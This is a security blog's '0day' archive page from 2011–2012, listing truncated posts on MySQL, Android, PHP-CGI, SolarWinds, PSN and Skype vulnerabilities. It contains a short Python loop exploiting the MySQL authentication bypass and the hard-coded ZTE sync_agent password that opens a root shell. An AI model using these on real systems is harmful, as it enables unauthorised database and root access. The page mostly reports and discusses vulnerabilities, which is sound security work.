This vulnerability was public by @hdmoore, @jcran, @jduck1337 and another security expert guys from my twitter.
This vulnerability effects on Ubuntu/Debian 32/64bit, MySQL 5.5.22 not work on RHEL/CentOS5 and 6 (x86_64)
Python script for this vulnerability
#!/usr/bin/pythonimport subprocesswhile 1: subprocess.Popen("mysql -u root mysql --password=blah", shell=True).wait(
Details here:
Showing posts with label 0day. Show all posts
Showing posts with label 0day. Show all posts
Sunday, 10 June 2012
MySQL Authen Bypass Vulnerability On Ubuntu (*update python script)
Labels:
0day,
exploitation,
Hacking,
howto,
Information Leak,
Information Security,
password,
pentest,
security,
Security News,
shell,
sql_injection,
trick
Monday, 14 May 2012
Nice backdoor, ZTE.
The ZTE Score M is an Android 2.3.4 (Gingerbread) phone available in the United States on MetroPCS, made by Chinese telecom ZTE Corporation. There is a setuid-root application at /system/bin/sync_agent that serves no function besides providing a root shell backdoor on the device. Just give the magic, hard-coded password to get a root shell: $ sync_agent ztex1609523 # id
Labels:
0day,
android,
backdoor,
exploitation,
Hacking,
Information Leak,
Information Security,
pentest,
shell,
tool,
trick,
Vulnerability
Friday, 4 May 2012
NMAP Script - NSE for detecting vulnerable PHP-CGI setups (CVE2012-1823)
Here is my script for detecting vulnerable PHP-CGI setups (CVE2012-1823). This is a pretty scary vuln as it affects a lot of installations. Here is the full advisory: http://eindbazen.net/2012/05/php-cgi-advisory-cve-2012-1823/ I'm going to look more into it to write a reliable exploitation script too. So far it seems the -r flag is not available in all the setups and we will need to exploit via
Labels:
0day,
article,
exploitation,
Hacking,
hacking tool,
Information Leak,
Information Security,
nmap,
packet analysis,
pentest,
security,
trick,
Web,
Web Application,
Web Application Attack
Tuesday, 7 February 2012
Android Multiple Vulnerabilities By 80vul.com
Android Multiple Vulnerabilities
Author: www.80vul.com [Email:5up3rh3i#gmail.com]
Release Date: 2012/2/8
References: http://www.80vul.com/android/android-0days.txt
Ph4nt0m Webzine 0x06 has been released[http://www.80vul.com/webzine_0x06/],
there three papers on the android application security about the development environment,browser security, inter-application communication.And published
Author: www.80vul.com [Email:5up3rh3i#gmail.com]
Release Date: 2012/2/8
References: http://www.80vul.com/android/android-0days.txt
Ph4nt0m Webzine 0x06 has been released[http://www.80vul.com/webzine_0x06/],
there three papers on the android application security about the development environment,browser security, inter-application communication.And published
Labels:
0day,
android,
exploitation,
Hacking,
Information Leak,
Information Security,
pentest,
security,
Source,
tool,
trojan
Tuesday, 24 January 2012
DDIVRT-2011-39 SolarWinds Storage Manager Server SQL Injection Authentication Bypass
Title ----- DDIVRT-2011-39 SolarWinds Storage Manager Server SQL Injection Authentication Bypass Severity -------- High Discovered By ------------- Digital Defense, Inc. Vulnerability Research Team Credit: r [at] b1$ Date Discovered --------------- December 7, 2011 Vulnerability Description ------------------------- The 'LoginServlet' page on port 9000 of the SolarWinds Storage Manager Server
Labels:
0day,
article,
exploitation,
Hacking,
Information Security,
password,
pentest,
security,
Security News,
sql_injection,
trick,
Web,
Web Application,
Web Application Attack
Wednesday, 18 May 2011
Warning All PSN Users: Accounts are still not safe.
I want to make this clear to ALL PSN users. Despite the methods currently employed to force a password change when you first reconnect to the PlayStation network, your accounts still remain unsafe.
A new hack is currently doing the rounds in dark corners of the internet that allows the attacker the ability to change your password using only your account’s email and date of birth.
It
Labels:
0day,
Information Leak,
Information Security,
news,
password,
security,
Security News,
Vulnerability
Sunday, 15 May 2011
Metasploit: Top 50 Exploits
The following is the top 50 exploits Metasploit would like to see contributed to the framework.
These vulnerabilities are sorted by severity and prevalence within enterprise environments.
CVE Description
2010-3655 Adobe Shockwave Player dirapi.dll Unspecified Overflow (2010-3655)
2010-2884 Adobe Flash Player Unspecified Code Execution
2010-2873 Adobe
These vulnerabilities are sorted by severity and prevalence within enterprise environments.
CVE Description
2010-3655 Adobe Shockwave Player dirapi.dll Unspecified Overflow (2010-3655)
2010-2884 Adobe Flash Player Unspecified Code Execution
2010-2873 Adobe
Labels:
0day,
backdoor,
Crack,
Hacking,
hacking tool,
Information Security,
linux,
metasploit,
security,
Source,
tool,
Vulnerability
Friday, 13 May 2011
Skype IM (MAC OS X) - Is this the 0day ?
Recently, we have came across about the news on SKYPE 0 DAY
that results in remote exploitation on MAC OS. However, we have also discovered the same pattern of vulnerability in Skype two months ago. Due to testing reasons, we were not indulged in the process of reporting it to vendor because we were looking at the malware paradigm related to this vulnerability(whether it can be
that results in remote exploitation on MAC OS. However, we have also discovered the same pattern of vulnerability in Skype two months ago. Due to testing reasons, we were not indulged in the process of reporting it to vendor because we were looking at the malware paradigm related to this vulnerability(whether it can be
Labels:
0day,
article,
exploitation,
Hacking,
hacking tool,
Information Leak,
Information Security,
security,
Vulnerability
Subscribe to:
Posts (Atom)